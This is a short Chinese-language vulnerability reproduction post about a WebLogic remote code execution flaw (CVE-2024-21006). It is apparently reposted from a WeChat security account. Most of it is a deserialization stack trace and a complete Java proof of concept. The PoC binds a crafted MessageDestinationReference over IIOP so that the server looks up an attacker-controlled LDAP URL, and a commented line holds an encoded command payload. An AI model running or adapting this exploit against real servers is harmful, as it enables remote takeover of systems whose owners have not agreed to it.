漏洞复现
漏洞原理
经典JDNI,没啥好分析的。
exec:443, Runtime (java.lang)exec:347, Runtime (java.lang)<clinit>:-1, Pwner572504195750900 (ysoserial)newInstance0:-1, NativeConstructorAccessorImpl (sun.reflect)newInstance:62, NativeConstructorAccessorImpl (sun.reflect)newInstance:45, DelegatingConstructorAccessorImpl (sun.reflect)newInstance:423, Constructor (java.lang.reflect)newInstance:442, Class (java.lang)getTransletInstance:455, TemplatesImpl (com.sun.org.apache.xalan.internal.xsltc.trax)newTransformer:486, TemplatesImpl (com.sun.org.apache.xalan.internal.xsltc.trax)getOutputProperties:507, TemplatesImpl (com.sun.org.apache.xalan.internal.xsltc.trax)invoke0:-1, NativeMethodAccessorImpl (sun.reflect)invoke:62, NativeMethodAccessorImpl (sun.reflect)invoke:43, DelegatingMethodAccessorImpl (sun.reflect)invoke:498, Method (java.lang.reflect)serializeAsField:688, BeanPropertyWriter (com.fasterxml.jackson.databind.ser)serializeFields:772, BeanSerializerBase (com.fasterxml.jackson.databind.ser.std)serialize:178, BeanSerializer (com.fasterxml.jackson.databind.ser)defaultSerializeValue:1150, SerializerProvider (com.fasterxml.jackson.databind)serialize:115, POJONode (com.fasterxml.jackson.databind.node)_serializeNonRecursive:105, InternalNodeMapper$WrapperForSerializer (com.fasterxml.jackson.databind.node)serialize:85, InternalNodeMapper$WrapperForSerializer (com.fasterxml.jackson.databind.node)serialize:39, SerializableSerializer (com.fasterxml.jackson.databind.ser.std)serialize:20, SerializableSerializer (com.fasterxml.jackson.databind.ser.std)_serialize:479, DefaultSerializerProvider (com.fasterxml.jackson.databind.ser)serializeValue:318, DefaultSerializerProvider (com.fasterxml.jackson.databind.ser)serialize:1572, ObjectWriter$Prefetch (com.fasterxml.jackson.databind)_writeValueAndClose:1273, ObjectWriter (com.fasterxml.jackson.databind)writeValueAsString:1140, ObjectWriter (com.fasterxml.jackson.databind)nodeToString:34, InternalNodeMapper (com.fasterxml.jackson.databind.node)toString:242, BaseJsonNode (com.fasterxml.jackson.databind.node)readObject:86, BadAttributeValueExpException (javax.management)invoke0:-1, NativeMethodAccessorImpl (sun.reflect)invoke:62, NativeMethodAccessorImpl (sun.reflect)invoke:43, DelegatingMethodAccessorImpl (sun.reflect)invoke:498, Method (java.lang.reflect)invokeReadObject:1058, ObjectStreamClass (java.io)readSerialData:1909, ObjectInputStream (java.io)readOrdinaryObject:1808, ObjectInputStream (java.io)readObject0:1353, ObjectInputStream (java.io)readObject:373, ObjectInputStream (java.io)readObject:1404, HashMap (java.util)invoke:-1, GeneratedMethodAccessor2 (sun.reflect)invoke:43, DelegatingMethodAccessorImpl (sun.reflect)invoke:498, Method (java.lang.reflect)invokeReadObject:1058, ObjectStreamClass (java.io)readSerialData:1909, ObjectInputStream (java.io)readOrdinaryObject:1808, ObjectInputStream (java.io)readObject0:1353, ObjectInputStream (java.io)readObject:373, ObjectInputStream (java.io)deserializeObject:531, Obj (com.sun.jndi.ldap)decodeObject:239, Obj (com.sun.jndi.ldap)c_lookup:1051, LdapCtx (com.sun.jndi.ldap)p_lookup:542, ComponentContext (com.sun.jndi.toolkit.ctx)lookup:177, PartialCompositeContext (com.sun.jndi.toolkit.ctx)lookup:205, GenericURLContext (com.sun.jndi.toolkit.url)lookup:94, ldapURLContext (com.sun.jndi.url.ldap)lookup:417, InitialContext (javax.naming)lookupMessageDestination:76, MessageDestinationReference (weblogic.application.naming)getObjectInstance:20, MessageDestinationObjectFactory (weblogic.application.naming)getObjectInstance:321, NamingManager (javax.naming.spi)lookup:308, WLEventContextImpl (weblogic.jndi.internal)lookup:435, WLContextImpl (weblogic.jndi.internal)lookup:417, InitialContext (javax.naming)resolveObject:461, NamingContextImpl (weblogic.corba.cos.naming)resolve_any:368, NamingContextImpl (weblogic.corba.cos.naming)_invoke:114, _NamingContextAnyImplBase (weblogic.corba.cos.naming)invoke:249, CorbaServerRef (weblogic.corba.idl)invoke:246, ClusterableServerRef (weblogic.rmi.cluster)run:564, BasicServerRef$3 (weblogic.rmi.internal)doAs:386, AuthenticatedSubject (weblogic.security.acl.internal)runAs:163, SecurityManager (weblogic.security.service)handleRequest:561, BasicServerRef (weblogic.rmi.internal)run:138, WLSExecuteRequest (weblogic.rmi.internal.wls)_runAs:352, ComponentInvocationContextManager (weblogic.invocation)runAs:337, ComponentInvocationContextManager (weblogic.invocation)doRunWorkUnderContext:57, LivePartitionUtility (weblogic.work)runWorkUnderContext:41, PartitionUtility (weblogic.work)runWorkUnderContext:655, SelfTuningWorkManagerImpl (weblogic.work)execute:420, ExecuteThread (weblogic.work)run:360, ExecuteThread (weblogic.work)
In weblogic.application.naming.MessageDestinationObjectFactory#getObjectInstance method we can control the obj argument as a MessageDestinationReference instance will be call weblogic.application.naming.MessageDestinationReference#lookupMessageDestination method, in the method we can play jndi attack.
POC
package org.example;import weblogic.j2ee.descriptor.InjectionTargetBean;import weblogic.j2ee.descriptor.MessageDestinationRefBean;import javax.naming.*;import java.util.Hashtable;public class MessageDestinationReference {public static void main(String[] args) throws Exception {String ip = "192.168.31.69";String port = "7001";// String rmiurl = "ldap://192.168.0.103/cVLtcNoHML/Plain/Exec/eyJjbWQiOiJ0b3VjaCAvdG1wL3N1Y2Nlc3MxMjMifQ==";String rhost = String.format("iiop://%s:%s", ip, port);Hashtable<String, String> env = new Hashtable<String, String>();// add wlsserver/server/lib/weblogic.jar to classpath,else will error.env.put("java.naming.factory.initial", "weblogic.jndi.WLInitialContextFactory");env.put(Context.PROVIDER_URL, rhost);Context context = new InitialContext(env);// Reference reference = new Reference("weblogic.application.naming.MessageDestinationObjectFactory","weblogic.application.naming.MessageDestinationObjectFactory","");weblogic.application.naming.MessageDestinationReference messageDestinationReference=new weblogic.application.naming.MessageDestinationReference(null, new MessageDestinationRefBean() {public String[] getDescriptions() {return new String[0];}public void addDescription(String s) {}public void removeDescription(String s) {}public void setDescriptions(String[] strings) {}public String getMessageDestinationRefName() {return null;}public void setMessageDestinationRefName(String s) {}public String getMessageDestinationType() {return "weblogic.application.naming.MessageDestinationReference";}public void setMessageDestinationType(String s) {}public String getMessageDestinationUsage() {return null;}public void setMessageDestinationUsage(String s) {}public String getMessageDestinationLink() {return null;}public void setMessageDestinationLink(String s) {}public String getMappedName() {return null;}public void setMappedName(String s) {}public InjectionTargetBean[] getInjectionTargets() {return new InjectionTargetBean[0];}public InjectionTargetBean createInjectionTarget() {return null;}public void destroyInjectionTarget(InjectionTargetBean injectionTargetBean) {}public String getLookupName() {return null;}public void setLookupName(String s) {}public String getId() {return null;}public void setId(String s) {}}, "ldap://127.0.0.1:1389/deserialJackson", null, null);context.bind("L0ne1y",messageDestinationReference);context.lookup("L0ne1y");}}
原文始发于微信公众号(安全之道):Weblogic RCE(CVE-2024-21006)
